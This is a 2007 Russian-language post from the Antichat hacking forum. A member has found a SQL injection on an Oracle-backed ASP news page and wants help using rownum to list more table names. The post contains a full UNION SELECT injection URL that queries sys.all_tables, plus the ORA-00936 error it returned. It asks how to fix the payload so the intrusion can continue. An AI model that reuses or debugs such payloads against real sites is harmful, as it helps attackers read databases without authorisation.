29.08.2007, 18:45
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
rownum в Oracle
Есть SQL-инъекция в Oracle, подобрано количество полей (9), а также те из них, которые могут выводить инфу. При попытке получить названия таблиц из sys.all_tables выводится только первое значение. Я знаю, что в Oracle нет аналога LIMIT'а, но есть rownum. Но когда я пробую запрос типа
http://site.com/news.asp?id=-1+UNION+SELECT+null,to_char(TABLE_NAME),NULL,NULL, NULL,NULL,NULL,NULL,NULL+FROM+sys.all_tables+where +rownum+<=+10--
получаю ошибку
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC driver for Oracle][Oracle]ORA-00936: missing expression
/news.asp, line 31
В чем может быть проблема? |
|
|